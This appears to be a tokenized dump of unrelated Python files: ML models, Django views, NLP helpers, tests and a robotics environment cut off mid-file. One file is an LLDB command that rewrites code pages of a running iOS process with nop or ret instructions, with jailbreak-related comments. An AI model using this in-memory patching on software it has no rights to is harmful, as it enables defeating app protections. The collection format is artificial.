out_channels[:-1]))<block_start>dblock.append(DBlock(nc_in nc_out downsample=<true> use_attention=(i+1)<in>self.sa_ids skip_proj=nc_in<eq>nc_out))<block_end>dblock.append(DBlock(in_channels[-1] out_channels[-1] downsample=<false> use_attention=len(out_channels)<in>self.sa_ids skip_proj=in_channels[-1]<eq>out_channels[-1]))<line_sep>self.blocks=dg.LayerList(dblock)<line_sep>self.final_fc=SpectralNorm(dg.Linear(16<times>chn 1))<line_sep>self.embed_y=dg.Embedding(size=[n_class 16<times>chn] is_sparse=<false> param_attr=Uniform(-0.1 0.1))<line_sep>self.embed_y=SpectralNorm(self.embed_y)<block_end><def_stmt>get_in_out_channels self<block_start>colors=self.colors<line_sep>resolution=self.resolution<if_stmt>resolution<eq>1024<block_start>channel_multipliers=[1 1 1 2 4 8 8 16 16]<block_end><elif_stmt>resolution<eq>512<block_start>channel_multipliers=[1 1 2 4 8 8 16 16]<block_end><elif_stmt>resolution<eq>256<block_start>channel_multipliers=[1 2 4 8 8 16 16]<block_end><elif_stmt>resolution<eq>128<block_start>channel_multipliers=[1 2 4 8 16 16]<block_end><elif_stmt>resolution<eq>64<block_start>channel_multipliers=[2 4 8 16 16]<block_end><elif_stmt>resolution<eq>32<block_start>channel_multipliers=[2 2 2 2]<block_end><else_stmt><block_start><raise>ValueError("Unsupported resolution: {}".format(resolution))<block_end>out_channels=[self.chn<times>c<for>c channel_multipliers]<line_sep>in_channels=[colors]+out_channels[:-1]<line_sep><return>in_channels out_channels<block_end><def_stmt>forward self input class_id=<none><block_start>out=input<line_sep>features=[]<for_stmt>i,dblock enumerate(self.blocks)<block_start>out=dblock(out)<line_sep>features.append(out)<block_end>out=layers.relu(out)<line_sep>out=layers.reduce_sum(out [2 3])<line_sep>out_linear=self.final_fc(out)<if_stmt>class_id<is><none><block_start>prod=0<block_end><else_stmt><block_start>class_emb=self.embed_y(class_id)<line_sep>prod=layers.reduce_sum((class_emb<times>out) 1 keep_dim=<true>)<block_end><return>layers.sigmoid(out_linear+prod) features<block_end><block_end>
# Copyright The PyTorch Lightning team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>inspect<import_from_stmt>typing Callable Optional<def_stmt>is_param_in_hook_signature hook_fx:Callable param:str explicit:bool=<false> min_args:Optional[int]=<none><arrow>bool<block_start>""" Args: hook_fx: the hook callable param: the name of the parameter to check explicit: whether the parameter has to be explicitly declared min_args: whether the `signature` as at least `min_args` parameters """<line_sep>parameters=inspect.getfullargspec(hook_fx)<line_sep>args=parameters.args[1:]# ignore `self` <return>(param<in>args<or>(<not>explicit<and>(parameters.varargs<is><not><none>))<or>(isinstance(min_args int)<and>len(args)<ge>min_args))<block_end>
""" catalogs//views.py """<import_from_stmt>django.http HttpResponse<import_from_stmt>catalogs.models Catalog<import_stmt>json<import_stmt>logging<line_sep>LOGGER=logging.getLogger('munkiwebadmin')<def_stmt>catalog_view request<block_start>'''Returns list of catalog names in JSON format'''<line_sep>catalog_list=Catalog.list()<line_sep>LOGGER.debug("Got request for catalog names")<line_sep><return>HttpResponse(json.dumps(catalog_list) content_type='application/json')<block_end><def_stmt>json_catalog_data request<block_start>'''Returns complied and sorted catalog data in JSON format'''<line_sep>LOGGER.debug("Got request for catalog data")<line_sep><return>HttpResponse(json.dumps(Catalog.catalog_info()) content_type='application/json')<block_end><def_stmt>get_pkg_ref_count request pkg_path<block_start>'''Returns the number of pkginfo files referencing a given pkg_path'''<line_sep>LOGGER.debug("Got request for pkg ref count for %s" pkg_path)<line_sep><return>HttpResponse(json.dumps(Catalog.get_pkg_ref_count(pkg_path)) content_type='application/json')<block_end>
"""Physical attributes of things. Right now, not much differs it from the constants module, but there will surely be much more to do with physics as time progresses. See Also: :mod:`constants` """<import_stmt>pygame<import_from_stmt>hypatia constants<class_stmt>Velocity(object)<block_start>"""Eight-directional velocity."""<def_stmt>__init__ self x=0 y=0<block_start>"""Speed in pixels per second per axis. Values may be negative. Args: x (int|None): -- y (int|None): -- """<line_sep>self.x=x<line_sep>self.y=y<block_end><block_end># this really isn't used, yet <class_stmt>Position(object)<block_start>"""The position of an object. Scaffolding. """<def_stmt>__init__ self x y size<block_start>"""Extrapolate position info from supplied info. Args: x (int|float): how many pixels from the left of the scene. y (int|float): how many pixels from the top of the scene. size (tuple): (x, y) pixel dimensions of object being represented. """<line_sep>self.rect=pygame.Rect((x y) size)<line_sep>self.float=(float(x) float(y))<line_sep>self.int=(x y)<block_end><block_end><class_stmt>AbsolutePosition(Position)<block_start>"""The absolute pixel coordinate in regard to the scene. Scaffolding. """<line_sep><pass><block_end>
"""Custom spaCy attributes for spaczz."""<import_from_future_stmt> annotations<import_from_stmt>typing Iterable Optional Set Tuple Type<import_stmt>warnings<import_from_stmt>spacy.tokens Doc Span Token<import_from_stmt>.exceptions AttrOverwriteWarning SpaczzSpanDeprecation<class_stmt>SpaczzAttrs<block_start>"""Adds spaczz custom attributes to spacy."""<line_sep>_initialized=<false><line_sep>@classmethod<def_stmt>initialize cls:Type[SpaczzAttrs]<arrow><none><block_start>"""Initializes and registers custom attributes."""<if_stmt><not>cls._initialized<block_start><try_stmt><block_start>Token.set_extension("spaczz_token" default=<false>)<line_sep>Token.set_extension("spaczz_type" default=<none>)<line_sep>Token.set_extension("spaczz_ratio" default=<none>)<line_sep>Token.set_extension("spaczz_counts" default=<none>)<line_sep>Token.set_extension("spaczz_details" default=<none>)<line_sep>Span.set_extension("spaczz_span" getter=cls.get_spaczz_span)<line_sep>Span.set_extension("spaczz_ent" getter=cls.get_spaczz_ent)<line_sep>Span.set_extension("spaczz_type" getter=cls.get_span_type)<line_sep>Span.set_extension("spaczz_types" getter=cls.get_span_types)<line_sep>Span.set_extension("spaczz_ratio" getter=cls.get_ratio)<line_sep>Span.set_extension("spaczz_counts" getter=cls.get_counts)<line_sep>Span.set_extension("spaczz_details" getter=cls.get_details)<line_sep>Doc.set_extension("spaczz_doc" getter=cls.get_spaczz_doc)<line_sep>Doc.set_extension("spaczz_types" getter=cls.get_doc_types)<line_sep>cls._initialized=<true><block_end><except_stmt>ValueError<block_start>warnings.warn("""One or more spaczz custom extensions has already been registered. These are being force overwritten. Please avoid defining personal, custom extensions prepended with "spaczz_". """ AttrOverwriteWarning )<line_sep>Token.set_extension("spaczz_token" default=<false> force=<true>)<line_sep>Token.set_extension("spaczz_type" default=<none> force=<true>)<line_sep>Token.set_extension("spaczz_ratio" default=<none> force=<true>)<line_sep>Token.set_extension("spaczz_counts" default=<none> force=<true>)<line_sep>Span.set_extension("spaczz_span" getter=cls.get_spaczz_span force=<true>)<line_sep>Span.set_extension("spaczz_type" getter=cls.get_span_type force=<true>)<line_sep>Span.set_extension("spaczz_types" getter=cls.get_span_types force=<true>)<line_sep>Span.set_extension("spaczz_ratio" getter=cls.get_ratio force=<true>)<line_sep>Span.set_extension("spaczz_counts" getter=cls.get_counts force=<true>)<line_sep>Doc.set_extension("spaczz_doc" getter=cls.get_spaczz_doc force=<true>)<line_sep>Doc.set_extension("spaczz_types" getter=cls.get_doc_types force=<true>)<block_end><block_end><block_end>@staticmethod<def_stmt>get_spaczz_span span:Span<arrow>bool<block_start>"""Getter for spaczz_span `Span` attribute."""<line_sep>warnings.warn("""spaczz_span is deprecated. Use spaczz_ent instead.""" SpaczzSpanDeprecation )<line_sep><return>all([token._.spaczz_token<for>token span])<block_end>@staticmethod<def_stmt>get_spaczz_ent span:Span<arrow>bool<block_start>"""Getter for spaczz_ent `Span` attribute."""<line_sep><return>all([token._.spaczz_token<for>token span])<block_end>@classmethod<def_stmt>get_span_type cls:Type[SpaczzAttrs] span:Span<arrow>Optional[str]<block_start>"""Getter for spaczz_type `Span` attribute."""<if_stmt>cls._all_equal([token._.spaczz_type<for>token span])<block_start><return>span[0]._.spaczz_type<block_end><else_stmt><block_start><return><none><block_end><block_end>@staticmethod<def_stmt>get_span_types span:Span<arrow>Set[str]<block_start>"""Getter for spaczz_types `Span` attribute."""<line_sep>types=[token._.spaczz_type<for>token span<if>token._.spaczz_type]<line_sep><return>set(types)<block_end>@classmethod<def_stmt>get_ratio cls:Type[SpaczzAttrs] span:Span<arrow>Optional[int]<block_start>"""Getter for spaczz_ratio `Span` attribute."""<if_stmt>cls._all_equal([token._.spaczz_ratio<for>token span])<block_start><return>span[0]._.spaczz_ratio<block_end><else_stmt><block_start><return><none><block_end><block_end>@classmethod<def_stmt>get_counts cls:Type[SpaczzAttrs] span:Span<arrow>Optional[Tuple[int int int]]<block_start>"""Getter for spaczz_counts `Span` attribute."""<if_stmt>cls._all_equal([token._.spaczz_counts<for>token span])<block_start><return>span[0]._.spaczz_counts<block_end><else_stmt><block_start><return><none><block_end><block_end>@classmethod<def_stmt>get_details cls:Type[SpaczzAttrs] span:Span<arrow>Optional[int]<block_start>"""Getter for current placeholder spaczz_details `Span` attribute."""<if_stmt>cls._all_equal([token._.spaczz_details<for>token span])<block_start><return>span[0]._.spaczz_details<block_end><else_stmt><block_start><return><none><block_end><block_end>@staticmethod<def_stmt>get_spaczz_doc doc:Doc<arrow>bool<block_start>"""Getter for spaczz_doc `Doc` attribute."""<line_sep><return>any([token._.spaczz_token<for>token doc])<block_end>@staticmethod<def_stmt>get_doc_types doc:Doc<arrow>Set[str]<block_start>"""Getter for spaczz_types `Doc` attribute."""<line_sep>types=[token._.spaczz_type<for>token doc<if>token._.spaczz_type]<line_sep><return>set(types)<block_end>@staticmethod<def_stmt>_all_equal iterable:Iterable<arrow>bool<block_start>"""Tests if all elements of iterable are equal."""<line_sep>iterator=iter(iterable)<try_stmt><block_start>first=next(iterator)<block_end><except_stmt>StopIteration<block_start><return><true><block_end><return>all(first<eq>rest<for>rest iterator)<block_end><block_end>
<import_stmt>sys<import_stmt>os<import_from_stmt>scipy spatial<import_stmt>numpy<as>np<def_stmt>editDistance str1 str2 m n# edit distance recursive implementation, m = len(str1) and n = len(str2) <block_start>dp=[[0<for>x range(n+1)]<for>x range(m+1)]<for_stmt>i range(m+1)<block_start><for_stmt>j range(n+1)<block_start><if_stmt>i<eq>0<block_start>dp[i][j]=j<block_end># Min. operations = j <elif_stmt>j<eq>0<block_start>dp[i][j]=i# Min. operations = i <block_end><elif_stmt>str1[i-1]<eq>str2[j-1]<block_start>dp[i][j]=dp[i-1][j-1]<block_end><else_stmt><block_start>dp[i][j]=1+min(dp[i][j-1] # Insert dp[i-1][j] # Remove dp[i-1][j-1])<block_end><block_end><block_end># Replace <return>dp[m][n]<block_end><def_stmt>concatenateString paragraph start length<block_start>final_string=paragraph[start]<for_stmt>i range(1 length)<block_start>final_string<augadd>" "+paragraph[start+i]<block_end><return>final_string<block_end><def_stmt>find_answer paragraph answer# check if answer already in paragraph <block_start>correct_answer=""<line_sep>score_answer=1000000<line_sep>para_words=paragraph.split()<for_stmt>i range(0 len(para_words))# check max 15 word ranges, reduced for efficiency <block_start><for_stmt>j range(1 min(15 len(para_words)-i+1))<block_start>candidate=concatenateString(para_words i j)<if_stmt>candidate<eq>answer<block_start><return>answer paragraph.find(answer)<block_end>score=editDistance(answer candidate len(answer) len(candidate))<if_stmt>(score<l>score_answer)<block_start>score_answer=score<line_sep>correct_answer=candidate<block_end><block_end><block_end><return>correct_answer paragraph.find(correct_answer)<block_end><def_stmt>test_find_answer <block_start>p="أصبحت بلاكبول وبلاكبيرن مع داروين سلطات وحدوية مستقلة "<line_sep>a="بلاكبو"<line_sep>print(find_answer(p a))<block_end>
<def_stmt>get_all_includes comp_args dst_includes<block_start>i=0<while_stmt>i<l>len(comp_args)<block_start>curr_arg=comp_args[i].strip()<if_stmt>curr_arg<eq>"-isystem"<block_start>curr_arg1="-I"+comp_args[i+1].strip()<if_stmt>curr_arg1<not><in>dst_includes<block_start>dst_includes.append(curr_arg1)<block_end><block_end><if_stmt>curr_arg<eq>"-include"<block_start>curr_arg1=comp_args[i+1].strip()<if_stmt>"dhd_sec_feature.h"<not><in>curr_arg1<block_start>final_arg=curr_arg+" "+curr_arg1<if_stmt>final_arg<not><in>dst_includes<block_start>dst_includes.append(final_arg)<block_end><block_end><block_end><if_stmt>curr_arg[0:2]<eq>"-I"<block_start><if_stmt>curr_arg<not><in>dst_includes<block_start><if_stmt>'drivers'<not><in>curr_arg<and>'sound'<not><in>curr_arg<block_start>dst_includes.append(curr_arg)<block_end><block_end><block_end>i<augadd>1<block_end><block_end>
<import_stmt>sys<line_sep>""" This module handles import compatibility issues between Python 2 and Python 3. """<line_sep># Syntax sugar. _ver=sys.version_info<line_sep>#: Python 2.x? is_py2=(_ver[0]<eq>2)<line_sep>#: Python 3.x? is_py3=(_ver[0]<eq>3)<if_stmt>is_py2<block_start>builtin_str=str<line_sep>bytes=str<line_sep>str=unicode<line_sep>basestring=basestring<line_sep>numeric_types=(int long float)<block_end><elif_stmt>is_py3<block_start>builtin_str=str<line_sep>str=str<line_sep>bytes=bytes<line_sep>basestring=(str bytes)<line_sep>numeric_types=(int float)<block_end>
#! /usr/bin/env python3 # ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ # |______|______|______|______|______|______|______|______|______|______|______|______|______|______|______|______|______| # _ ___ _ _ _____ ____ # (_) / _ \| | | | | __ \| _ \ # __ ___ __ _| | | | | | | | | | | |_) | # \ \/ / |/ _` | | | | | | | | | | | _ < # > <| | (_| | |_| | |____| |____| |__| | |_) | # /_/\_\_|\__,_|\___/|______|______|_____/|____/ # ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ # |______|______|______|______|______|______|______|______|______|______|______|______|______|______|______|______|______| <import_stmt>lldb<import_stmt>os<import_stmt>shlex<import_stmt>optparse<import_stmt>json<import_stmt>re<import_stmt>utils<def_stmt>__lldb_init_module debugger internal_dict<block_start>debugger.HandleCommand('command script add -f patcher.handle_command patcher -h "patch code in lldb"')<line_sep># print('========') # print('[patcher]: patch code in lldb') # print('\tpatcher -a patch_addr -i instrument -s instrument_count') # print('\tmore usage, try "patcher -h"') <block_end><def_stmt>handle_command debugger command exe_ctx result internal_dict<block_start>command_args=shlex.split(command posix=<false>)<line_sep>parser=generate_option_parser()<try_stmt><block_start>(options _)=parser.parse_args(command_args)<block_end><except_stmt><block_start>result.SetError(parser.usage)<line_sep><return><block_end>_=exe_ctx.target<line_sep>_=exe_ctx.thread<if_stmt>options.patchInstrument<block_start><if_stmt>options.patchAddress<block_start>patch_addr=int(options.patchAddress 16)<block_end><else_stmt><block_start>ret=utils.exe_cmd(debugger "p/x $pc")<line_sep>ret=ret.strip()<line_sep>pattern='0x[0-9a-f]+'<line_sep>match=re.search(pattern ret)<if_stmt>match<block_start>found=match.group(0)<block_end><else_stmt><block_start>utils.ELOG("not get address:"+ret)<line_sep><return><block_end>utils.ILOG("you not set patch address, default is current pc address:{}".format(found))<line_sep>patch_addr=int(found 16)<block_end>patch_ins=options.patchInstrument<line_sep># default instrument size is 1 patch_size=0x1<line_sep>patch_ins=patch_ins.replace("\"" "")<line_sep>patch_ins=patch_ins.replace("'" "")<if_stmt>options.patchSize<block_start>patch_size=int(options.patchSize)<block_end>ret=patcher(debugger patch_ins patch_addr patch_size)<line_sep>result.AppendMessage(str(ret))<block_end><else_stmt><block_start>result.AppendMessage("[-] args error, check it !")<block_end><return><block_end><def_stmt>patch_code debugger addr ins count<block_start>command_script='@import Foundation;\n'<line_sep>command_script<augadd>'uint64_t x_addr = {};\n'.format(addr)<line_sep>command_script<augadd>'uint8_t patch_data[] = {};\n'.format(ins)<line_sep>command_script<augadd>'int insCount = {};\n'.format(count)<line_sep>command_script<augadd>r''' NSMutableString* retStr = [NSMutableString string]; void * patch_addr = (void*)x_addr; //uint8_t patch_data[] = {0xc0, 0x03, 0x5f, 0xd6}; int patch_data_size = 4*insCount; // =====================================================patch code============================================= typedef bool (*patch_code_t)(void* patch_addr, uint8_t* patch_data, int patch_data_size); patch_code_t patch_code = [](void* patch_addr, uint8_t* patch_data, int patch_data_size) -> bool { #define PAGE_SIZE 0x0000000000004000 #define PAGE_MASK 0x0000000000003fff #define RTLD_LAZY 0x1 #define RTLD_NOW 0x2 #define RTLD_LOCAL 0x4 #define RTLD_GLOBAL 0x8 #define VM_PROT_READ ((vm_prot_t) 0x01) #define VM_PROT_WRITE ((vm_prot_t) 0x02) #define VM_PROT_EXECUTE ((vm_prot_t) 0x04) #define PROT_NONE 0x00 /* [MC2] no permissions */ #define PROT_READ 0x01 /* [MC2] pages can be read */ #define PROT_WRITE 0x02 /* [MC2] pages can be written */ #define PROT_EXEC 0x04 /* [MC2] pages can be executed */ #define MAP_SHARED 0x0001 #define MAP_ANON 0x1000 #define KERN_SUCCESS 0 typedef unsigned int mach_port_t; typedef int kern_return_t; typedef unsigned int vm_inherit_t; typedef mach_port_t task_t; typedef int vm_prot_t; typedef unsigned long uintptr_t; typedef uintptr_t vm_offset_t; typedef vm_offset_t vm_address_t; typedef uint64_t mach_vm_address_t; typedef int boolean_t; typedef int vm_behavior_t; typedef uint32_t vm32_object_id_t; typedef uintptr_t vm_size_t; typedef int *vm_region_recurse_info_t; typedef unsigned long long memory_object_offset_t; struct vm_region_submap_short_info_64 { vm_prot_t protection; /* present access protection */ vm_prot_t max_protection; /* max avail through vm_prot */ vm_inherit_t inheritance;/* behavior of map/obj on fork */ memory_object_offset_t offset; /* offset into object/map */ unsigned int user_tag; /* user tag on map entry */ unsigned int ref_count; /* obj/map mappers, etc */ unsigned short shadow_depth; /* only for obj */ unsigned char external_pager; /* only for obj */ unsigned char share_mode; /* see enumeration */ boolean_t is_submap; /* submap vs obj */ vm_behavior_t behavior; /* access behavior hint */ vm32_object_id_t object_id; /* obj/map name, not a handle */ unsigned short user_wired_count; }; typedef unsigned int __darwin_natural_t; typedef __darwin_natural_t natural_t; typedef natural_t mach_msg_type_number_t; typedef struct vm_region_submap_short_info_64 vm_region_submap_short_info_data_64_t; #define VM_REGION_SUBMAP_SHORT_INFO_COUNT_64 \ ((mach_msg_type_number_t) \ (sizeof (vm_region_submap_short_info_data_64_t) / sizeof (natural_t))) #define VM_FLAGS_OVERWRITE 0x4000 /* delete any existing mappings first */ typedef int __int32_t; typedef __int32_t __darwin_pid_t; typedef __darwin_pid_t pid_t; // init value kern_return_t kret; task_t self_task = (task_t)mach_task_self(); /* Set platform binary flag */ #define FLAG_PLATFORMIZE (1 << 1) // platformize_me // https://github.com/pwn20wndstuff/Undecimus/issues/112 /* void* handle = (void*)dlopen("/usr/lib/libjailbreak.dylib", RTLD_LAZY); if (!handle){ //[retStr appendString:@"[-] /usr/lib/libjailbreak.dylib dlopen failed!\n"]; return false; } // Reset errors (const char *)dlerror(); typedef void (*fix_entitle_prt_t)(pid_t pid, uint32_t what); fix_entitle_prt_t ptr = (fix_entitle_prt_t)dlsym(handle, "jb_oneshot_entitle_now"); const char *dlsym_error = (const char *)dlerror(); if (dlsym_error) return; ptr((pid_t)getpid(), FLAG_PLATFORMIZE); //[retStr appendString:@"\n[+] platformize me success!"]; */ void* target_addr = patch_addr; // 1. get target address page and patch offset unsigned long page_start = (unsigned long) (target_addr) & ~PAGE_MASK; unsigned long patch_offset = (unsigned long)target_addr - page_start; // map new page for patch void *new_page = (void *)mmap(NULL, PAGE_SIZE, 0x1 | 0x2, 0x1000 | 0x0001, -1, 0); if (!new_page ){ //[retStr appendString:@"[-] mmap failed!\n"]; return false; } kret = (kern_return_t)vm_copy(self_task, (unsigned long)page_start, PAGE_SIZE, (vm_address_t) new_page); if (kret != KERN_SUCCESS){ //[retStr appendString:@"[-] vm_copy faild!\n"]; return false; } // 4. start patch /* nop -> {0x1f, 0x20, 0x03, 0xd5} ret -> {0xc0, 0x03, 0x5f, 0xd6} */ // char patch_ins_data[4] = {0x1f, 0x20, 0x03, 0xd5}; // mach_vm_write(task_self, (vm_address_t)(new+patch_offset), patch_ret_ins_data, 4); memcpy((void *)((uint64_t)new_page+patch_offset), patch_data, patch_data_size); //[retStr appendString:@"[+] patch ret[0xc0 0x03 0x5f 0xd6] with memcpy\n"]; // set back to r-x (int)mprotect(new_page, PAGE_SIZE, PROT_READ | PROT_EXEC); //[retStr appendString:@"[*] set new page back to r-x success!\n"]; // remap vm_prot_t prot; vm_inherit_t inherit; // get page info vm_address_t region = (vm_address_t) page_start; vm_size_t region_len = 0; struct vm_region_submap_short_info_64 vm_info; mach_msg_type_number_t info_count = VM_REGION_SUBMAP_SHORT_INFO_COUNT_64; natural_t max_depth = 99999; kret = (kern_return_t)vm_region_recurse_64(self_task, &region, &region_len, &max_depth, (vm_region_recurse_info_t) &vm_info, &info_count); if (kret != KERN_SUCCESS){ //[retStr appendString:@"[-] vm_region_recurse_64 faild!\n"]; return false; } prot = vm_info.protection & (PROT_READ | PROT_WRITE | PROT_EXEC); inherit = vm_info.inheritance; //[retStr appendString:@"[*] get page info done.\n"]; vm_prot_t c; vm_prot_t m; mach_vm_address_t target = (mach_vm_address_t)page_start; kret = (kern_return_t)mach_vm_remap(self_task, &target, PAGE_SIZE, 0, VM_FLAGS_OVERWRITE, self_task, (mach_vm_address_t) new_page, true, &c, &m, inherit); if (kret != KERN_SUCCESS){ //[retStr appendString:@"[-] remap mach_vm_remap faild!\n"]; return false; } //[retStr appendString:@"[+] remap to target success!\n"]; // clear cache void* clear_start_ = (void*)(page_start + patch_offset); sys_icache_invalidate (clear_start_, 4); sys_dcache_flush (clear_start_, 4); return true; }; // =====================================================patch code============================================= patch_code(patch_addr, patch_data, patch_data_size); [retStr appendString:@"patch done."]; retStr '''<line_sep>retStr=utils.exe_script(debugger command_script)<line_sep><return>utils.hex_int_in_str(retStr)<block_end><def_stmt>is_raw_data data# pylint: disable=anomalous-backslash-in-string <block_start>pattern="\{\s*0x[0-9a-fA-F]{2}\s*,\s*0x[0-9a-fA-F]{2}\s*,\s*0x[0-9a-fA-F]{2}\s*,\s*0x[0-9a-fA-F]{2}\s*\}"<line_sep>ret=re.match(pattern data)<if_stmt><not>ret<block_start><return><false><block_end><return><true><block_end><def_stmt>patcher debugger ins addr size<block_start><if_stmt>is_raw_data(ins)<block_start>utils.ILOG("detect you manual set ins data:{}".format(ins))<line_sep>utils.ILOG("start patch text at address:{} size:{} to ins data:{}".format(hex(addr) size ins))<line_sep>patch_code(debugger hex(addr) ins size)<line_sep><return>"[x] power by xia0@2019"<block_end>supportInsList={'nop':'0x1f, 0x20, 0x03, 0xd5 ' 'ret':'0xc0, 0x03, 0x5f, 0xd6' 'mov0':'0x00, 0x00, 0x80, 0xd2' 'mov1':'0x20, 0x00, 0x80, 0xd2'}<if_stmt>ins<not><in>supportInsList.keys()<block_start>utils.ELOG("patcher not support this ins type:{}".format(ins))<line_sep><return>"[x] power by xia0@2019"<block_end>utils.ILOG("start patch text at address:{} size:{} to ins:\"{}\" and data:{}".format(hex(addr) size ins supportInsList[ins]))<line_sep># for i in range(size): # patch_code(debugger, hex(curPatchAddr), supportInsList[ins]) # utils.SLOG("current patch address:{} patch done".format(hex(curPatchAddr))) # curPatchAddr += 4 ins_data=""<for_stmt>i range(size)<block_start>ins_data<augadd>supportInsList[ins]<if_stmt>i<ne>size-1<block_start>ins_data<augadd>","<block_end><block_end>build_ins_data="{"+ins_data+"}"<line_sep>utils.ILOG("make ins data:\n{}".format(build_ins_data))<line_sep>patch_code(debugger hex(addr) build_ins_data size)<line_sep>utils.SLOG("patch done")<line_sep><return>"[x] power by xia0@2019"<block_end><def_stmt>generate_option_parser <block_start>usage="patcher"<line_sep>parser=optparse.OptionParser(usage=usage prog="lookup")<line_sep>parser.add_option("-a" "--address" action="store" default=<none> dest='patchAddress' help="need patch code address")<line_sep>parser.add_option("-i" "--instrument" action="store" default=<none> dest='patchInstrument' help="patch instrument type")<line_sep>parser.add_option("-s" "--size" action="store" default=<none> dest='patchSize' help="patch instrument count")<line_sep><return>parser<block_end>
<import_stmt>pytest<import_stmt>ingestion.transformers.monosi.monitors<as>monitors<line_sep>@pytest.fixture<def_stmt>schema <block_start><return>{'columns':['NAME' 'COL_NAME' 'COL_TYPE' 'COL_DESCRIPTION' 'COL_SORT_ORDER' 'DATABASE' 'SCHEMA' 'DESCRIPTION' 'IS_VIEW'] 'rows':[{'NAME':'name_of_table' 'COL_NAME':'name_of_col' 'COL_TYPE':'timestamp_tz' 'COL_DESCRIPTION':<none> 'COL_SORT_ORDER':'3' 'DATABASE':'database' 'SCHEMA':'schema' 'DESCRIPTION':<none> 'IS_VIEW':'false'} {'NAME':'name_of_table' 'COL_NAME':'name_of_col_2' 'COL_TYPE':'text' 'COL_DESCRIPTION':<none> 'COL_SORT_ORDER':'3' 'DATABASE':'database' 'SCHEMA':'schema' 'DESCRIPTION':<none> 'IS_VIEW':'false'} {'NAME':'name_of_table_2' 'COL_NAME':'name_of_col_3' 'COL_TYPE':'int' 'COL_DESCRIPTION':<none> 'COL_SORT_ORDER':'3' 'DATABASE':'database' 'SCHEMA':'schema' 'DESCRIPTION':<none> 'IS_VIEW':'false'} ]}<block_end><def_stmt>test__transform_empty <block_start>input_arr={'rows':[]}<line_sep>output_arr=monitors.MonitorTransformer._transform(input_arr)<assert_stmt>len(output_arr)<eq>0<block_end><def_stmt>test__transform schema<block_start>output_arr=monitors.MonitorTransformer._transform(schema)<line_sep>expected_num_monitors=2<assert_stmt>len(output_arr)<eq>expected_num_monitors<block_end>@pytest.fixture<def_stmt>monitor <block_start><return>{}<block_end>@pytest.fixture<def_stmt>normalized_schema <block_start><return>monitors.MonitorTransformer._normalized_schema()<block_end><def_stmt>test__normalized_schema_correct normalized_schema monitor<block_start>input_arr=[monitor]<line_sep>is_correct=monitors.MonitorTransformer.match(input_arr normalized_schema)<assert_stmt>is_correct<eq><true><block_end><def_stmt>test__normalized_schema_correct_multiple normalized_schema monitor<block_start>input_arr=[monitor monitor]<line_sep>is_correct=monitors.MonitorTransformer.match(input_arr normalized_schema)<assert_stmt>is_correct<eq><true><block_end><def_stmt>test__normalized_schema_incorrect_to_have_none normalized_schema<block_start>input_arr=[]<line_sep>is_correct=monitors.MonitorTransformer.match(input_arr normalized_schema)<assert_stmt>is_correct<eq><false><block_end><def_stmt>test__normalized_schema_incorrect normalized_schema<block_start>input_arr=[{"anything":"goeshere"}]<line_sep>is_correct=monitors.MonitorTransformer.match(input_arr normalized_schema)<assert_stmt>is_correct<eq><false><block_end><def_stmt>test__normalized_schema_incorrect_multiple normalized_schema<block_start>input_arr=[{} {"anything":"goeshere"}]<line_sep>is_correct=monitors.MonitorTransformer.match(input_arr normalized_schema)<assert_stmt>is_correct<eq><false><block_end>@pytest.fixture<def_stmt>original_schema <block_start><return>monitors.MonitorTransformer._original_schema()<block_end><def_stmt>test__original_schema_correct original_schema schema<block_start>is_correct=monitors.MonitorTransformer.match(schema original_schema)<assert_stmt>is_correct<eq><true><block_end><def_stmt>test__original_schema_incorrect_to_have_none original_schema<block_start>is_correct=monitors.MonitorTransformer.match({} original_schema)<assert_stmt>is_correct<eq><false><block_end><def_stmt>test__original_schema_incorrect original_schema<block_start>input_arr={'anything':'goeshere'}<line_sep>is_correct=monitors.MonitorTransformer.match(input_arr original_schema)<assert_stmt>is_correct<eq><false><block_end>
<import_stmt>mujoco_py<import_from_stmt>pathlib Path<import_from_stmt>mushroom_rl.utils spaces<import_from_stmt>mushroom_rl.environments.mujoco MuJoCo ObservationType<import_from_stmt>mushroom_rl.utils.running_stats *<import_from_stmt>._external_simulation NoExternalSimulation MuscleSimulation<import_from_stmt>.reward_goals CompleteTrajectoryReward VelocityProfileReward MaxVelocityReward NoGoalReward HumanoidTrajectory<import_from_stmt>mushroom_rl.environments.mujoco_envs.humanoid_gait.utils quat_to_euler<class_stmt>HumanoidGait(MuJoCo)<block_start>""" Mujoco simulation of a Humanoid Model, based on: "A deep reinforcement learning based approach towards generating human walking behavior with a neuromuscular model". <NAME>., <NAME>., <NAME>., and <NAME>. (2019). """<def_stmt>__init__ self gamma=0.99 horizon=2000 n_intermediate_steps=10 use_muscles=<true> goal_reward=<none> goal_reward_params=<none> obs_avg_window=1 act_avg_window=1<block_start>""" Constructor. Args: gamma (float, 0.99): discount factor for the environment; horizon (int, 2000): horizon for the environment; n_intermediate_steps (int, 10): number of steps to apply the same action to the environment and wait for the next observation; use_muscles (bool): if external muscle simulation should be used for actions. If not apply torques directly to the joints; goal_reward (string, None): type of trajectory used for training Options available: 'trajectory' - Use trajectory in assets/GaitTrajectory.npz as reference; 'com_vel_trajectory' - Use only velocity trajectory of COM in assets/GaitTrajectory.npz as reference; 'vel_profile' - Velocity goal for the center of mass of the model to follow. The goal is given by a VelocityProfile instance (or subclass). And should be included in the ``goal_reward_params``; 'max_vel' - Tries to achieve the maximum possible velocity; None - Follows no goal(just tries to survive); goal_reward_params (dict, None): params needed for creation goal reward; obs_avg_window (int, 1): size of window used to average observations; act_avg_window (int, 1): size of window used to average actions. """<line_sep>self.use_muscles=use_muscles<line_sep>self.goal_reward=goal_reward<line_sep>self.act_avg_window=act_avg_window<line_sep>self.obs_avg_window=obs_avg_window<line_sep>model_path=Path(__file__).resolve().parent.parent/"data"/"humanoid_gait"/"human7segment.xml"<line_sep>action_spec=["right_hip_frontal" "right_hip_sagittal" "right_knee" "right_ankle" "left_hip_frontal" "left_hip_sagittal" "left_knee" "left_ankle" ]<line_sep>observation_spec=[("root" ObservationType.JOINT_POS) ("right_hip_frontal" ObservationType.JOINT_POS) ("right_hip_sagittal" 